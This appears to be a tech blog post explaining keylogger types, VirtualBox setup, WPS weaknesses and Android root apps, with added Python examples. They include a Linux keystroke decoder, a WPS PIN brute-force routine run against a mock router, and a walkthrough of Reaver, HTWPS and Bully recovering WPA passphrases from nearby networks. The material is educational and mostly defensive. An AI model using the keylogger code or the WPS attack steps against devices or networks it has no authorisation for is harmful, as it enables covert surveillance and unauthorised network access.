Keyloggers

Keylogging “is the action of recording (logging) the keys struck on a keyboard, typically covertly, so that the person using the keyboard is unaware that their actions are being monitored”. It can be done with software or hardware, and it can serve malicious purposes or legitimate ones such as human-computer interaction research.

There are many different kinds of software keyloggers.

  • Hypervisor-based: A malicious hypervisor runs underneath the operating system, which keeps running untouched as a virtual machine while the hypervisor captures its keyboard input.
  • Kernel-based: The logger runs inside the kernel (installing it requires root or administrator rights), for example as a keyboard driver, so it sees every keystroke before any application does. This type is very hard to detect from user space.
  • API-based: The logger hooks the operating system's keyboard APIs (for example by registering a system-wide keyboard hook or polling key state) and records the events it receives, just as a normal application would.
  • Form grabbing based: The logger hooks the browser and copies data entered into web forms at submission time, before the browser encrypts it for transmission over the internet, so HTTPS does not protect against it.
  • JavaScript-based: A malicious script tag injected into a web page can listen for key events on that page. The injection can happen through XSS (cross-site scripting) or a MITM (man-in-the-middle) attack on a page delivered over plain HTTP.
  • Memory injection based: The logger alters in-memory data tables of the browser and other system functions to divert keystrokes, the technique used by man-in-the-browser banking malware.
  • HTTP packet based: The logger sniffs network traffic and parses HTTP requests; it recovers only passwords sent without encryption (plain HTTP), not those protected by HTTPS.
  • Remote access based: Any of the above, extended to offload its logs to a remote location: a hardware dongle, an online server, or an email address.
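To make the kernel- and API-based entries concrete, here is an added example (not code from the original post) that decodes the raw events a Linux keylogger of those kinds consumes. On Linux the kernel delivers every keystroke as a struct input_event on /dev/input/event*, and any process that can open that device (root, or a member of the input group) sees every key in every application, long before a browser or TLS is involved. The event bytes are constructed inline with struct.pack so the decoder runs offline; the key-code subset, the sample keystrokes and the device path in the comment are assumptions for illustration.

```python
"""Decode Linux evdev keyboard events, the raw feed a kernel/API keylogger reads.

Constructed, offline example: the event bytes below are built with struct.pack
in the same layout the kernel writes to /dev/input/event*, so nothing here
touches a real device.
"""
import struct

# struct input_event { struct timeval time; __u16 type; __u16 code; __s32 value; }
EVENT_FMT = "llHHi"            # native layout: 24 bytes on 64-bit Linux
EVENT_SIZE = struct.calcsize(EVENT_FMT)

EV_KEY = 1                     # key press/release events (EV_SYN etc. are skipped)
PRESS, RELEASE, REPEAT = 1, 0, 2

# Subset of linux/input-event-codes.h: key code -> (unshifted, shifted)
KEYMAP = {
    2: ("1", "!"), 3: ("2", "@"), 16: ("q", "Q"), 17: ("w", "W"),
    18: ("e", "E"), 23: ("i", "I"), 24: ("o", "O"), 35: ("h", "H"),
    38: ("l", "L"), 28: ("\n", "\n"), 57: (" ", " "),
}
KEY_LEFTSHIFT, KEY_RIGHTSHIFT = 42, 54


def iter_events(raw: bytes):
    """Yield (type, code, value) for each complete input_event in the buffer."""
    for off in range(0, len(raw) - EVENT_SIZE + 1, EVENT_SIZE):
        _sec, _usec, etype, code, value = struct.unpack_from(EVENT_FMT, raw, off)
        yield etype, code, value


def decode_keystrokes(raw: bytes) -> str:
    """Turn a raw event stream into typed text, tracking Shift like a logger would."""
    shift_down = False
    text = []
    for etype, code, value in iter_events(raw):
        if etype != EV_KEY:
            continue
        if code in (KEY_LEFTSHIFT, KEY_RIGHTSHIFT):
            shift_down = value in (PRESS, REPEAT)
            continue
        if value == RELEASE or code not in KEYMAP:
            continue               # releases and unmapped keys add no text
        text.append(KEYMAP[code][1 if shift_down else 0])
    return "".join(text)


def make_event(code: int, value: int, etype: int = EV_KEY) -> bytes:
    """Constructed event bytes with zeroed timestamps (sample input only)."""
    return struct.pack(EVENT_FMT, 0, 0, etype, code, value)


def key_tap(code: int) -> bytes:
    """A press followed by a release of one key."""
    return make_event(code, PRESS) + make_event(code, RELEASE)


# Constructed capture: Shift+h, i, 1, Enter, with an EV_SYN marker in between.
SAMPLE_CAPTURE = (
    make_event(KEY_LEFTSHIFT, PRESS) + key_tap(35) + make_event(KEY_LEFTSHIFT, RELEASE)
    + make_event(0, 0, etype=0)      # EV_SYN, ignored by the decoder
    + key_tap(23) + key_tap(2) + key_tap(28)
)

if __name__ == "__main__":
    # A real logger would loop over open("/dev/input/eventN", "rb").read(EVENT_SIZE)
    # instead of using SAMPLE_CAPTURE (device number is an assumption).
    print(repr(decode_keystrokes(SAMPLE_CAPTURE)))   # 'Hi1\n'
```

The practical check this suggests: on a Linux machine, look at who may read the input devices (ls -l /dev/input and the membership of the input group). Anything that can open those files can log keystrokes without any hooking or injection at all, which is why the kernel-based class is so hard to spot from inside the applications it watches.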

[Image: actual-keylogger, a software keylogger program]

While software keyloggers are powerful, hardware keyloggers can be embedded within the keyboard itself or placed as an external device, and no software running on the computer can detect them. There are also various kinds of these.

  • Firmware-based: The firmware that handles keyboard input (for example the BIOS) is modified to record keystrokes. It has to be written for the specific hardware it runs on, and it is active before the operating system even loads.
  • Keyboard hardware: A circuit embedded inside the keyboard, or an external inline device plugged in between the keyboard and the computer, records the keystrokes for later retrieval.
  • Wireless keyboard and mouse sniffers: A receiver captures the radio traffic of a wireless keyboard or mouse; if the encryption is weak or missing, the attacker can read keystrokes or even inject commands remotely.
  • Keyboard overlays: A fake keypad placed over the real one, often at ATMs to capture card PINs. It is designed to blend into the machine’s design.
  • Acoustic keyloggers: A very advanced method that identifies keystrokes from the sounds individual keys make, since each key produces a slightly different sound.
  • Electromagnetic emissions: The electromagnetic emissions of a wired keyboard are captured from a distance and decoded into keystrokes.
  • Optical surveillance: A strategically placed camera records keystrokes and PINs as they are typed.

[Image: timestamp_hardware_keylogger_01, a hardware keylogger designed for PS/2 and USB keyboards]

As you can see, keyloggers are very dangerous, so be careful about which websites you visit and which software you install. If you work in an office or another environment shared with many people, also check the keyboard cable and USB ports for inline hardware loggers, because no antivirus will see those.

Virtual Machines

A virtual machine is an emulation of a computer system. Large servers commonly run many virtual machines with different operating systems. As a consumer, you may want to run another operating system on top of your current host OS, for example Windows on your Mac, or Linux on Windows. The combinations are endless and can be very useful for running applications that don’t exist on your platform, or for keeping risky software (an untrusted download, a malware sample) isolated from your host. Several programs let you virtualize operating systems; some of the most popular are VirtualBox, VMware Fusion (VMware Workstation on Windows and Linux), and Parallels. All of them have advantages and disadvantages, so you need to decide what’s best for you.

For example on one host machine, in this case a Mac, you can have various different operating systems.


By doing this, you are no longer restricted to the capabilities of your host OS.


If you’ve ever wanted to try macOS without paying for a Mac, you can install it in a virtual machine and use it, although note that Apple’s licence only permits running macOS on Apple hardware.

Setting up a virtual machine is easy and takes only a few steps. First, download the operating system you want to use. It usually comes as a disk image, such as an .iso file. Get it from the vendor’s own site and compare its checksum with the one the vendor publishes, so you are not installing a tampered image.


After you download the file, often between 1 and 8 gigabytes, install VirtualBox from virtualbox.org or some other virtualization software. For this tutorial, we are going to use VirtualBox.

Once you open the application, click New and choose the setup options matching the version of the operating system you downloaded.


Next, allocate the amount of RAM for the machine and create a virtual hard drive. Suitable values vary from computer to computer, and you can look up what’s best for your OS and hardware.


After that, open the machine’s settings, attach the OS .iso to the virtual optical drive under Storage, and set the amount of Video Memory under Display.


Finally, click OK, start the machine and proceed with the installation. Some distributions offer a Live CD option, which boots the OS temporarily instead of installing it to the VDI hard drive. Once inside the operating system, consider installing the Guest Additions package to improve the usability and speed of the machine; shared folders and the shared clipboard come with it, so enable those deliberately if you are using the VM to isolate untrusted software.
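The same steps as a script, as an added example that is not part of the original tutorial: it verifies the ISO’s SHA-256 against the digest the vendor publishes (Ubuntu, for instance, ships a SHA256SUMS file next to its images) and then issues the VBoxManage commands that correspond to New, RAM, virtual disk, attaching the ISO and video memory. It assumes VBoxManage (installed with VirtualBox) is on PATH; the VM name, OS type, sizes, ISO path and the checksum placeholder are illustrative values to replace. Without VBoxManage installed, or with dry_run=True, it only prints the commands it would run.

```python
"""Build a VirtualBox VM from the command line after checking the ISO's digest.

Added example; names, sizes and the checksum placeholder are assumptions.
"""
import hashlib
import shutil
import subprocess


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_iso_bytes(data: bytes, expected_hex: str) -> bool:
    """True when the SHA-256 of the data equals the vendor-published digest."""
    return sha256_bytes(data) == expected_hex.strip().lower()


def verify_iso(path: str, expected_hex: str) -> bool:
    """Streaming version of verify_iso_bytes for multi-gigabyte images."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest() == expected_hex.strip().lower()


def vbox_commands(name, ostype, ram_mb, vram_mb, disk_mb, iso):
    """The GUI steps as VBoxManage argv lists: create, RAM+VRAM, disk, attach ISO."""
    disk = f"{name}.vdi"
    return [
        ["VBoxManage", "createvm", "--name", name, "--ostype", ostype, "--register"],
        ["VBoxManage", "modifyvm", name, "--memory", str(ram_mb), "--vram", str(vram_mb),
         "--boot1", "dvd", "--boot2", "disk"],
        ["VBoxManage", "createmedium", "disk", "--filename", disk, "--size", str(disk_mb)],
        ["VBoxManage", "storagectl", name, "--name", "SATA", "--add", "sata",
         "--controller", "IntelAhci"],
        ["VBoxManage", "storageattach", name, "--storagectl", "SATA", "--port", "0",
         "--device", "0", "--type", "hdd", "--medium", disk],
        ["VBoxManage", "storageattach", name, "--storagectl", "SATA", "--port", "1",
         "--device", "0", "--type", "dvddrive", "--medium", iso],
    ]


def build_vm(name, ostype, ram_mb, vram_mb, disk_mb, iso, expected_sha256, dry_run=False):
    """Refuse to build from an ISO whose digest does not match; else run (or print) the commands."""
    if not dry_run and not verify_iso(iso, expected_sha256):
        raise SystemExit(f"checksum mismatch for {iso}; not building the VM")
    cmds = vbox_commands(name, ostype, ram_mb, vram_mb, disk_mb, iso)
    if dry_run or shutil.which("VBoxManage") is None:
        for cmd in cmds:
            print(" ".join(cmd))
        return cmds
    for cmd in cmds:
        subprocess.run(cmd, check=True)
    subprocess.run(["VBoxManage", "startvm", name], check=True)   # equivalent of clicking Start
    return cmds


if __name__ == "__main__":
    build_vm("lab-ubuntu", "Ubuntu_64", 2048, 32, 20480, "ubuntu.iso",
             "0" * 64,      # placeholder: paste the digest from the vendor's SHA256SUMS file
             dry_run=True)
```

A matching digest only proves the file is the one the vendor listed; if the vendor also signs the checksum file (Ubuntu publishes SHA256SUMS.gpg), verify that signature with gpg first, otherwise an attacker who can swap the ISO can swap the checksum file too.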

Wi-Fi Protected Setup (WPS)

WPS is a network security standard intended to make setting up a secure wireless home network easy. It was created so that end users can add devices to the network without typing long passphrases, and it offers two ways to do that: a push button on the router and an 8-digit PIN.

After you press the button on the router, you connect by tapping the WPS Push Button option on your phone within a window of about two minutes. Once the router recognizes the device, it transmits the data needed to associate with the access point, including the actual WPA passphrase, to the phone. Any device that presses its WPS button inside that window can join, not only yours.

From a non-technical standpoint this seems very simple, but the standard has several vulnerabilities that can be exploited.

Because WPS hands the enrolling device the real WPA passphrase, anyone who gets physical access to your router’s WPS button and connects with it walks away with that passphrase. On a rooted Android phone, a password recovery app simply reads it back out of the stored Wi-Fi configuration: select the network and view the passphrase.


Another big vulnerability is that an attacker within radio range can brute force the WPS PIN needed to connect, without ever touching the router. A WPS PIN has only 8 digits, and the eighth is a checksum of the other seven, so at most 10,000,000 PINs are valid. Worse, the router tells the client whether the first four digits were correct before it checks the rest, which cuts the search to at most 10,000 + 1,000 = 11,000 attempts. On a router with no rate limiting that is a matter of hours, not years.
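The arithmetic above, as an added worked example that is not part of the original post. MockAccessPoint is a constructed stand-in for a router’s WPS registrar (it only mimics the fact that the registrar answers the first half of the PIN separately from the second), not a real implementation of the protocol; the PIN 12345670 is a well-known default value used here as sample input, and the lockout counter models newer firmware that stops answering after a few failures.

```python
"""Why an 8-digit WPS PIN falls to brute force: checksum digit plus split validation.

Added example with a constructed mock registrar; no radio traffic involved.
"""


def wps_pin_checksum(first7: int) -> int:
    """Checksum digit appended to a 7-digit WPS PIN (algorithm from the WPS spec)."""
    accum = 0
    pin = first7
    while pin:
        accum += 3 * (pin % 10)
        pin //= 10
        accum += pin % 10
        pin //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_pin_checksum(int(pin[:7])) == int(pin[7])


class WpsLockedOut(Exception):
    """The mock AP has locked WPS after too many failed attempts."""


class MockAccessPoint:
    """Validates the PIN in two halves, the way the WPS registrar exchange leaks it.

    lockout_after=None models an old router with no rate limiting; a small
    number models firmware that locks WPS after that many failures.
    """

    def __init__(self, pin: str, lockout_after=None):
        if not is_valid_pin(pin):
            raise ValueError("not a valid WPS PIN")
        self.pin = pin
        self.lockout_after = lockout_after
        self.failures = 0

    def _check(self, ok: bool) -> bool:
        if self.lockout_after is not None and self.failures >= self.lockout_after:
            raise WpsLockedOut("AP stopped answering WPS requests")
        if not ok:
            self.failures += 1
        return ok

    def first_half_ok(self, half: int) -> bool:
        # A real AP answers message M3 with M4 (continue) or EAP-NACK, leaking half the PIN.
        return self._check(self.pin[:4] == f"{half:04d}")

    def second_half_ok(self, half: int) -> bool:
        return self._check(self.pin[4:] == f"{half:04d}")


def crack_pin(ap: MockAccessPoint):
    """Return (pin, attempts used). Worst case 11,000 attempts, never 10**8."""
    attempts = 0
    for a in range(10_000):
        attempts += 1
        if ap.first_half_ok(a):
            break
    else:
        raise RuntimeError("no first half accepted")
    for b in range(1_000):
        attempts += 1
        second = b * 10 + wps_pin_checksum(a * 1000 + b)   # last digit is fixed by the checksum
        if ap.second_half_ok(second):
            return f"{a:04d}{second:04d}", attempts
    raise RuntimeError("no second half accepted")


MAX_SPLIT_ATTEMPTS = 10_000 + 1_000   # what the protocol leak reduces the search to
NAIVE_ATTEMPTS = 10 ** 8              # what an 8-digit PIN would cost without the leak

if __name__ == "__main__":
    pin, n = crack_pin(MockAccessPoint("12345670"))
    print(f"recovered {pin} after {n} attempts (max {MAX_SPLIT_ATTEMPTS}, naive {NAIVE_ATTEMPTS})")
```

Running crack_pin against the lockout-enabled mock raises WpsLockedOut after the configured number of failures, which is exactly the behaviour that separates the “open to attack” routers the scanning tools list from patched ones: the PIN is just as weak on both, but only the former keep answering.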

Using an external Wi-Fi card that supports monitor mode and a Linux distribution such as Kali Linux, you can easily set up tools such as Reaver and High Touch WPS Breaker (HTWPS), a menu-driven script that wraps such tools. They brute force the PIN on routers whose old firmware neither locks WPS nor rate-limits attempts; once the PIN is accepted, the router hands over the WPA passphrase.

[Image: high-touch-wps-breaker, the HTWPS menu]

After typing 01 in the menu, the script scans and returns a list of nearby networks that advertise WPS and appear open to the attack. Because many manufacturers ship routers with WPS enabled by default, the list is often very long.

[Image: wps, the PIN returned by the tool]

In the image above you see the PIN that has been returned. With the PIN known, a tool such as Bully (or Reaver itself) asks the router for the original WPA passphrase, which it hands over exactly as it would to a legitimate device.

As you can see, WPS trades security for convenience. Good practice is to disable it on your router’s settings page, which stops both the PIN method and the hardware button. Some firmware has been reported to keep answering PIN requests even when WPS is shown as disabled, so afterwards confirm from a Linux laptop with a monitor-mode card that the wash scanner (shipped with Reaver) no longer lists your network as WPS-enabled, and keep the router’s firmware up to date.

Best Root Apps

Once you have rooted your phone, you may wonder which apps to install first. Many of them make your phone experience better or more customizable. Keep in mind that a root app can read and change anything on the device, so install only ones you trust.

The first app is Substratum, a theme engine for stock AOSP ROMs. It is very powerful and can theme your whole device to make it feel completely different. It uses OMS (Overlay Manager Service) to apply the changes.

It works very well and can theme the whole Android System UI as well as a majority of popular apps. Above you can see the all black themed Settings app.

Another great app is Titanium Backup. With it you can make full backups of all your apps and their data, so you can seamlessly transfer your data from one ROM to another, and you have a copy in case you lose anything. Since it runs as root, it can do things such as batch backup and restore with no user interaction. Those backups contain your apps’ private data and login tokens, so store them somewhere protected.

You can see the list of apps it has, the options for each individual app, and batch actions that you can schedule at different times.

The last app is very powerful and goes by the name of Kernel Adiutor. It provides control over device hardware settings such as CPU/GPU clock speeds (including underclocking) and sensor input control.

Changing these settings can be dangerous, however, so only install the app if you know what they do. Used correctly, it can save battery and make your device smoother.

These are just 3 of the many great root apps that I would recommend, but there are many more useful ones that are out there for you to find.